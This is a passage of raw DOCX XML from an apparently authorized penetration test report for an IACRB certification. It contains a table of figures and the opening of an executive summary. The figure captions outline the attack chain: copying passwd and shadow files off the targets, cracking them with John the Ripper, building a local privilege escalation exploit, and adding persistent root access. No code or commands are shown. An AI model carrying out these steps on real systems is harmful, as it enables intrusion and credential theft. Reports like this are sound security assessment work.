          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="000328A1">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="000328A1">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc422058360 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="000328A1">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="000328A1">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000328A1">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>10</w:t>
        </w:r>
        <w:r w:rsidR="000328A1">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7955CC0D" w14:textId="77777777" w:rsidR="000328A1" w:rsidRDefault="000328A1">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc422058361" w:history="1">
        <w:r w:rsidRPr="00CE0B41">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 2: FTP cptvm2 passwd and shadow Files to Attack Machine</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc422058361 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>11</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6B820DF3" w14:textId="77777777" w:rsidR="000328A1" w:rsidRDefault="000328A1">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc422058362" w:history="1">
        <w:r w:rsidRPr="00CE0B41">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 3: Use "John the Ripper" to Crack Other Passwords on cptvm2</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc422058362 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>12</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="775E0D73" w14:textId="77777777" w:rsidR="000328A1" w:rsidRDefault="000328A1">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc422058363" w:history="1">
        <w:r w:rsidRPr="00CE0B41">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 4: Find an Exploit for cptvm1</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc422058363 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>13</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6E36DD73" w14:textId="77777777" w:rsidR="000328A1" w:rsidRDefault="000328A1">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc422058364" w:history="1">
        <w:r w:rsidRPr="00CE0B41">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 5: FTP the Exploit Source Code to cptvm1</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc422058364 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>14</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="49DA7B8A" w14:textId="77777777" w:rsidR="000328A1" w:rsidRDefault="000328A1">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc422058365" w:history="1">
        <w:r w:rsidRPr="00CE0B41">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 6: Build the Exploit on cptvm1</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc422058365 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>15</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5DC23339" w14:textId="77777777" w:rsidR="000328A1" w:rsidRDefault="000328A1">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc422058366" w:history="1">
        <w:r w:rsidRPr="00CE0B41">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 7: Obtaining root Access on cptvm1</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc422058366 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>16</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7E340697" w14:textId="77777777" w:rsidR="000328A1" w:rsidRDefault="000328A1">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc422058367" w:history="1">
        <w:r w:rsidRPr="00CE0B41">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 8: Permanently Provide root Access to Account "cptvm1" on Target cptvm1</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc422058367 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>17</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2CEDDCD9" w14:textId="77777777" w:rsidR="000328A1" w:rsidRDefault="000328A1">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc422058368" w:history="1">
        <w:r w:rsidRPr="00CE0B41">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 9: Prepare the passwd and shadow Files to be Copied to the Attack Machine via FTP</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc422058368 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>18</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3C3E2C67" w14:textId="77777777" w:rsidR="000328A1" w:rsidRDefault="000328A1">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc422058369" w:history="1">
        <w:r w:rsidRPr="00CE0B41">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 10: Copy the passwd and shadow Files from cptvm1 to the Attack Machine</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc422058369 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>19</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="383A2E68" w14:textId="77777777" w:rsidR="000328A1" w:rsidRDefault="000328A1">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc422058370" w:history="1">
        <w:r w:rsidRPr="00CE0B41">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 11: Use "John the Ripper" to Harvest the root (and Other) Password from cptvm1</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc422058370 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>20</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1613AD7F" w14:textId="77777777" w:rsidR="00E851B8" w:rsidRDefault="00E851B8">
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B62EA5" w14:textId="77777777" w:rsidR="00F30B6A" w:rsidRPr="002E1C46" w:rsidRDefault="00F30B6A" w:rsidP="00204DD5">
      <w:pPr>
        <w:pageBreakBefore/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E1C46">
        <w:rPr>
          <w:b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Document Details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16281CAD" w14:textId="40322154" w:rsidR="002E1C46" w:rsidRPr="002E1C46" w:rsidRDefault="002E1C46" w:rsidP="002E1C46">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E1C46">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Created by:  </w:t>
      </w:r>
      <w:r w:rsidR="001A6D81">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>David Theese</w:t>
      </w:r>
      <w:r w:rsidR="0088108E">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>, CPT (Pending), CEH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE0DD2F" w14:textId="579331C1" w:rsidR="002E1C46" w:rsidRPr="002E1C46" w:rsidRDefault="002E1C46" w:rsidP="002E1C46">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E1C46">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">For:  </w:t>
      </w:r>
      <w:r w:rsidR="001A6D81">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>IACRB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9220BA" w14:textId="70C78289" w:rsidR="002E1C46" w:rsidRPr="002E1C46" w:rsidRDefault="002E1C46" w:rsidP="002E1C46">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E1C46">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Delivered to:  </w:t>
      </w:r>
      <w:r w:rsidR="001A6D81">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>IACRB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFE5271" w14:textId="57C718E7" w:rsidR="002E1C46" w:rsidRPr="002E1C46" w:rsidRDefault="002E1C46" w:rsidP="002E1C46">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E1C46">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Classification:  </w:t>
      </w:r>
      <w:r w:rsidR="001A6D81">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>SBU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33AD8ED8" w14:textId="0890AB76" w:rsidR="002E1C46" w:rsidRDefault="002E1C46" w:rsidP="002E1C46">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E1C46">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Document History: </w:t>
      </w:r>
      <w:r w:rsidR="001A6D81">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Version 1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9D259B" w14:textId="77777777" w:rsidR="001E08E5" w:rsidRDefault="001E08E5" w:rsidP="001E08E5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A6AD06" w14:textId="77777777" w:rsidR="00AE6C4E" w:rsidRDefault="00AE6C4E" w:rsidP="00204DD5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc422058349"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>EXECUTIVE SUMMARY</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="1C0CF33E" w14:textId="63D9FE58" w:rsidR="00BD62D2" w:rsidRDefault="001A6D81" w:rsidP="00AE6C4E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204DD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The overall security posture of the organization was found to be seriously lacking. </w:t>
      </w:r>
      <w:r w:rsidR="00BD62D2">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">We were authorized to access two machines during our test. </w:t>
      </w:r>
      <w:r w:rsidRPr="00204DD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Full compromise</w:t>
      </w:r>
      <w:r w:rsidR="00BD62D2">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0089039D">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">(access) </w:t>
      </w:r>
      <w:r w:rsidR="00BD62D2">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">of both </w:t>
      </w:r>
      <w:r w:rsidR="009A0F5B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>targets</w:t>
      </w:r>
      <w:r w:rsidR="00BD62D2">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> was achieved, including the harvesting of four usernames / passwords from one </w:t>
      </w:r>
      <w:r w:rsidR="009A0F5B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>target</w:t>
      </w:r>
      <w:r w:rsidR="00BD62D2">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00D576D1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>three</w:t>
      </w:r>
      <w:r w:rsidR="00BD62D2">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> from the other.</w:t>
      </w:r>
      <w:r w:rsidR="00B44F9B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> This was accomplished by simply observing network traffic, and by employing one l</w:t>
      </w:r>
      <w:r w:rsidR="00742850">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ocal privilege elevation</w:t>
      </w:r>
      <w:r w:rsidR="00B44F9B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit </w:t>
      </w:r>
      <w:r w:rsidR="00E56EA6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">(see </w:t>
      </w:r>
      <w:r w:rsidR="00E56EA6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00E56EA6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF _Ref422055287 \h </w:instrText>
      </w:r>
      <w:r w:rsidR="00E56EA6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="00E56EA6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r w:rsidR="00E56EA6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E56EA6">
        <w:t>APPENDIX 1: D</w:t>
      </w:r>
      <w:r w:rsidR="00E56EA6">
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00E56EA6">
        <w:t>finitions</w:t>
      </w:r>
      <w:r w:rsidR="00E56EA6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00E56EA6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidR="00B44F9B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>that was readily obtainable from the Internet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D8C533" w14:textId="6D77B6B8" w:rsidR="001A6D81" w:rsidRPr="00204DD5" w:rsidRDefault="001A6D81" w:rsidP="00AE6C4E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204DD5">
